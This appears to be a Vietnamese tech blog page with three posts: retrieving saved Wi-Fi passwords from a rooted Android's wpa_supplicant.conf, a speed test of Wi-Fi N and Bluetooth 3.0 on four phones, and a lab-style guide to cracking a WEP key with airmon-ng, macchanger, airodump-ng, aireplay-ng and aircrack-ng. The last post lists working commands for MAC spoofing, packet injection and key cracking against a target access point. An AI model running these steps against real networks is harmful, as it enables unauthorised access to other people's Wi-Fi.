Hiển thị các bài đăng có nhãn Wifi. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn Wifi. Hiển thị tất cả bài đăng

Thứ Tư, 10 tháng 4, 2013

Tìm lại mật khẩu Wi-Fi trên Android

Nếu cần truy cập lại các điểm phát Wi-Fi từng kết nối trước đây, nhưng lại quên password, người dùng có thể tìm lại thông tin này thật dễ dàng với Root Browser Lite.


Sử dụng Root Browser Lite

Để thực hiện được các thao tác này, thiết bị Android cần được root trước đó. Ngoài Root Browser Lite, người dùng có thể sử dụng Root Explorer (File Manager), tuy nhiên, ứng dụng này có bản quyền (giá 3,59 USD). Còn nếu muốn đơn giản hơn, Wi-Fi Key Recovery và Wi-Fi Pass Recovery chính là những lựa chọn đáng giá.

Bước 1:

Tải về cài đặt ứng dụng Root Browser Lite từ kho ứng dụng Google Play.

Ứng dụng Root Browser Lite trên Google Play.


Bước 2:

Kích hoạt ứng dụng Root Browser Lite vừa cài đặt.

Bước 3:

Tại trang Home, truy cập theo đường dẫn: /data/misc/wifi.

Chọn thư mục data.


Chọn thư mục misc.


Chọn thư mục wifi.


Bước 4:

Trong thư mục Wifi, nhấn vào tập tin wpa_supplicant.conf, chọn một ứng dụng đọc được văn bản ở danh sách hiện ra để mở xem nội dung.

Tập tin wpa_supplicant.conf chứa thông tin các kết nối wifi đã từng truy cập.


Bước 5:

Nội dung tập tin wpa_supplicant.conf hiện ra với đầy đủ thông tin về những kết nối Wi-Fi mà thiết bị từng truy cập, kể cả những kết nối không có mã khóa. Theo đó, trường ssid là tên của kết nối, còn mật mã được hiển thị ở dòng psk. Nếu thiết bị có cài đặt Root Explorer, bạn cũng có thể chuyển hướng sang mở tập tin bằng ứng dụng này.

Thông tin đọc được từ file wpa_supplicant.conf.


Sử dụng WiFi Pass Recovery

Được thiết kế với giao diện trực quan, đơn giản, WiFi Pass Recovery sẽ hiển thị ngay thông tin các kết nối Wi-Fi trên màn hình. Bạn có thể ghi ra giấy để đăng nhập lại về sau.

Danh sách các kết nối Wi-Fi mà WiFi Pass Recovery tìm được.


Sử dụng WiFi Key Recovery

Cũng tự động đọc dữ liệu từ các tập tin hệ thống để gửi thông tin kết nối Wi-Fi đến người dùng ngay lập tức, tuy nhiên WiFi Key Recovery còn mạnh mẽ hơn ở tính năng lưu trữ. Theo đó, bạn có thể yêu cầu WiFi Key Recovery lưu thông tin xuống thẻ nhớ, hoặc chia sẻ qua Bluetooth, Email, Google+…

Thông tin các điểm kết nối Wi-Fi do WiFi Key Recovery lọc lại.

Thứ Tư, 10 tháng 10, 2012

Wi-Fi chuẩn N và Bluetooth 3.0 mang lại kết nối tốc độ cao là điều ai cũng đã biết. Nhưng thực sự có đúng như quảng cáo?

Không còn là công nghệ xa lạ như cách đây một hai năm, Wi-Fi chuẩn N và Bluetooth 3.0 hiện tại đã trở nên phổ biến và xuất hiện ngày càng nhiều trên những sản phẩm cao cấp.
Theo lý thuyết thì Wi-Fi 802.11n (tức chuẩn N) cho phép đạt băng thông rất lớn, lên đến 300 Mb/giây, so với 54 Mb/giây của chuẩn b/g và tăng hiệu năng cao hơn ở phạm vi rộng hơn. Còn đối với Bluetooth 3.0 cho tốc độ truyền tải lên đến 24 Mb/giây, nhanh gấp gần 10 lần so với chuẩn v2.1 hỗ trợ EDR (tốc độ chỉ khoảng 3 Mb/giây), đồng thời quản lý năng lượng tốt hơn cùng với khả năng kết nối độ trễ thấp.
Tuy nhiên, thực tiễn đôi khi lại không giống với lý thuyết. Dù vẫn biết Wi-Fi chuẩn N cùng Bluetooth 3.0 là những kết nối hiện đại, nhanh và mạnh hơn những chuẩn cũ, nhưng có rất ít người biết được nó nhanh như thế nào và khác ra sao so với thế hệ trước. Chính vì vậy, cách tốt nhất là thử nghiệm thực tế để kiểm chứng những gì mà lý thuyết đã đưa ra.
Sản phẩm thử nghiệm được chọn là bốn chiếc điện thoại khá quen thuộc với những nền tảng khác nhau, hệ điều hành cũng khác nhau: iPhone 4 (hệ điều hành iOS), Nokia N8 (Symbian^3), Samsung Galaxy S (Android) và Samsung Wave (Bada). Tất cả đều được trang bị Wi-Fi chuẩn N; chỉ duy nhất có iPhone 4 là vẫn sở hữu chuẩn Bluetooth v2.1, những sản phẩm còn lại đều có Bluetooth 3.0.



Apple iPhone 4, Nokia N8, Samsung I9000 Galaxy S, Samsung S8500 Wave

Thử nghiệm Wi-Fi chuẩn N
Thiết lập thử nghiệm
Việc cần làm đầu tiên trước khi kiểm nghiệm kết nối không dây Wi-Fi chính là thiết lập đường truyền mạng và thiết bị phát sóng. Tất nhiên để không bị ảnh hưởng bởi tác nhân bên ngoài, thử nghiệm sẽ sử dụng đường truyền server duy nhất và không hề chia sẻ cho bất cứ thiết bị ngoại vi nào khác ngoài bốn sản phẩm thử nghiệm. Đồng thời, thiết bị sử dụng để lập trạm phát sóng Wi-Fi là bộ định tuyến Nergear WNDR3700. Bộ định tuyến sẽ phát lần lượt Wi-Fi chuẩn G và chuẩn N ở hai chế độ 130 Mb/giây và 300 Mb/giây (hiệu suất tối đa).
Nhìn chung, chế độ phát Wi-Fi 300 Mb/giây sẽ cho kết quả tốt hơn chế độ 150 Mb/giây hoặc chế độ G. Do đó, các bước thiết lập bộ định tuyến Wi-Fi chuẩn N là rất quan trọng. Cụ thể, bạn cần sử dụng mã hóa theo chuẩn WPA2/AES và QoS phải được kích hoạt trên bộ định tuyến.
Phần cuối nhưng cũng không kém phần quan trọng là khi có bất cứ một thiết bị sử dụng Wi-Fi chuẩn G trong mạng không dây chuẩn N thì mạng này sẽ tự động giảm dần tốc độ xuống mức G với khoảng 54 Mb/giây. Đây là khả năng tương thích ngược của các bộ phát Wi-Fi, tuy nhiên các thiết bị khác dùng Wi-Fi chuẩn N trong cùng mạng thì lại không đạt tốc độ tối đa. Giải pháp là bạn nên có bộ định tuyến riêng cho các thiết bị Wi-Fi chuẩn G và riêng cho chuẩn N trong cùng một mạng.

Thử nghiệm 1
Thử nghiệm đầu tiên sẽ được thực hiện bằng việc tải về một tập tin dung lượng 30 MB bằng trình duyệt web của mỗi điện thoại. Vị trí thử nghiệm cũng được chia ra thành hai khu vực: gần bộ định tuyến (khoảng 1,5 m) và trong phòng xung quanh chỉ những bức tường với độ rộng vừa đủ để tất cả điện thoại có thể bắt sóng tốt.
Kết quả thử nghiệm cho thấy với vị trí gần bộ định tuyến thì Samsung Galaxy S đạt băng thông lớn nhất (20 Mb/giây), tiếp theo là iPhone 4 (17 Mb/giây). Khi bộ định tuyến phát ở chế độ G thì dù Galaxy cũng đạt băng thông lớn nhất (18 Mb/giây) nhưng lại không thay đổi nhiều so với chuẩn N. Điều này cho thấy Wi-Fi chuẩn N không nhanh hơn bao nhiêu so với Wi-Fi chuẩn G.
Với vị trí xa bộ định tuyến, Nokia N8 cho chất lượng tốt nhất và tương tự băng thông cũng không thay đổi nhiều (10 Mb/giây so với 14 Mb/giây). Ở vị trí này, khi phát Wi-Fi chuẩn N thì hầu hết các sản phẩm đều có băng thông lớn hơn so với cùng vị trí khi phát Wi-Fi chuẩn G. Như vậy, Wi-Fi chuẩn N không tăng phạm vị phủ sóng, nhưng có băng thông lớn hơn Wi-Fi chuẩn G ở những vị trí cách xa bộ định tuyến.

Thử nghiệm 2
Thí nghiệm hai sẽ càng rõ ràng hơn khi cho cả bốn sản phẩm thử nghiệm cùng tải những trang web như nhau. Không giống như thí nghiệm 1, lần này vị trí thử nghiệm được cố định một chỗ cách bộ định tuyến khoảng 5 mét.
Kết quả thử nghiệm cho thấy sự khác biệt trong việc tải trang web với chế độ phát Wi-Fi chuẩn N là không nhiều so với chuẩn G. Tuy nhiên, sự thay đổi không mang chiều hướng tích cực mà thậm chí ngược lại với trường hợp của Samsung Galaxy S. Với chế độ phát N 150 Mb/giây, trình duyệt web của Android chậm lại khoảng 8%, và với chế độ N 300Mb/giây thì chậm lại khoảng 30%.



Tính chất thực sự của Wi-Fi chuẩn N là tăng phạm vi phủ sóng đồng thời tăng băng thông so với chuẩn G. Đặc biệt tốc độ theo lý thuyết đạt đến 300 Mb/giây (gấp gần 6 lần so với chuẩn G)
Thử nghiệm Bluetooth 3.0
Vấn đề của Bluetooth 3.0 xem ra đơn giản hơn Wi-Fi chuẩn N rất nhiều. Các thử nghiệm cho thấy tốc độ của Bluetooth 3.0 trên các thiết bị Galaxy S, Nokia N8 và Samsung Wave không thể đạt được đến tốc độ 24 Mb/giây. Và lý do lý giải duy nhất về việc này chính là do... công nghệ quảng cáo.
Thực tế chuẩn Bluetooth 3.0 phải đáp ứng ba tiêu chí: Kết nối liên tục hơn với chế độ chia nhỏ dữ liệu để giảm thời gian trễ, quản lý năng lượng tốt hơn và quan trong nhất là kỹ thuật Alternate MAC/PHY.
Alternate MAC/PHY là kỹ thuật khá thú vị của Bluetooth 3.0. Nó cho phép hai thiết bị cùng chuẩn Bluetooth 3.0 kết nối với nhau qua Bluetooth, sau đó tự giả lập một mạng Wi-Fi 802.11 ảo giữa hai thiết bị giúp tăng tốc độ lên đến mức 24 Mb/giây.
Những thiết bị nào hỗ trợ Alternate MAC/PHY sẽ được gọi chính xác là Bluetooth 3.0 + HS (High Speed). Lợi dụng cách đặt tên này, nhiều hãng đã cố tình chỉ đặt tên gọi chuẩn của mình là Bluetooth 3.0 với một số cải tiến tiết kiệm năng lượng, giảm độ trễ,…còn đặc trưng làm nên thương hiệu của Bluertooth 3.0 là Alternate MAC/PHY thì không hề có.
Như vậy, không có sản phẩm nào trong thử nghiệm có Bluetooth 3.0 + HS mà chính xác chuẩn mà những thiết bị này hỗ trợ chỉ là vanilla v3.0, một chuẩn rút gọn của Bluetooth 3.0 + HS.
Một giả thiết khác cũng có thể xảy ra là những thiết bị được trang bị Bluetooth 3.0 hiện tại chưa được hỗ trợ hoàn toàn từ phần mềm (hoặc hệ điều hành) trên thiết bị, nên không thể phát huy những tính chất thực sự của Bluetooth 3.0. Cũng có thể trong tương lai với sự góp mặt của phần mềm mới hơn, Bluetooth 3.0 mới thực sự được kích hoạt. 
Bluetooth 3.0 hàng “xịn” phải rõ ràng với khả năng tạo mạng Wi-Fi cho kết nối tốc độ cao (HS-High Speed) giữa hai thiết bị

Kết luận
Wi-Fi chuẩn N vẫn có những mặt tích cực như băng thông tốt hơn chuẩn G khi ở vị trí xa bộ đinh tuyến nhưng tốc độ không thể nào tăng lên 6 lần so với tốc độ 54 Mb/giây của chuẩn G. Bluetooth 3.0, còn tệ hơn khi gần như không cảm nhận được sự thay đổi đáng kể nào.
Thực tế người dùng thường ít quan tâm (hoặc không có điều kiện kiểm nghiệm) đến tốc độ thực sự của các chuẩn kết nối không dây trên điện thoại di động. Quan điểm này giúp các hãng sản xuất thường “nói quá” trong công nghệ quảng cáo của mình. Và Wi-Fi chuẩn N, Bluetooth 3.0 là những chiêu tiếp thị “ảo” khá hoành tráng.

Thứ Tư, 19 tháng 10, 2011

Hack wireless by backtrack 3

Bước1: Start chương trình airmon-ng để đổi địa chỉ MAC address của card wireless bằng các câu lệnh
Airmon-ng stop ath0
Ifconfig wifi0 down
Macchanger --mac 00:11:22:33:55 wifi0
Xem hình minh hoạ:



Bước 2: chuyển card wireless về chế độ monitor bằng lệnh:
Airmon-ng start wifi0



Bước 3: Dò và xác định các thông số của AP target bằng chương trình airodump-ng
Airodump-ng ath0
kết qủa dò tìm như hình sau. Ta chú ý các thông số BSSID, kênh, kiểu mã hoá.



Bước 4: Dùng airodump-ng để capture gói tin dựa vào các thông số trên bằng lệnh:
airodump-ng -c 1 –w/root/desktop/capture/wep64 –bssid 00:14:bf:05:d6:0c ath0
-c 1 : kênh phát của AP target là kênh 1
/root/desktop/capture/wep64: đường dẫn lưu file capture
00:14:bf:05:d6:0c : MAC address của AP target



Bước 5: Dùng chương trình aireplay-ng để tim gói đến AP nhằm tăng lưu lượng gói để capture nhanh hơn.
Aireplay-ng -3 -b 00:14:bf:05:d6:0c –h 00:11:22:33:55 ath0
Quá trình tim gói như hình sau:



Trở lại màn hình airodump để quan sát quá trình bắt gói. Trong bài lap này, với số gói là 10333 (mất khoảng 15s ) thì có thể tìm được khoá




Dùng chương trình aircrack-ng để tìm ra khoá.
Aircrack-ng –n 64 --bssid 00:14:bf:05:d6:0c /root/desktop/capture/wep64-01.cap
Quan sát quá trình phân tích và tìm khoá như hình sau:




CRACK WEP KEY 128 BITS:

Quá trình crack wep 128 bits bao gồm các bước thực hiện hoàn toàn tương tự như việc crack wep 64 bits. Chỉ khác là ta cần capture nhiều gói tin hơn. Để crack được wep 128 bits, ta cần tối thiểu khoảng 1100000 packets (mất khoảng 40 phút và cần khoảng 5000 ivs).



DBS M05479
Quang Cao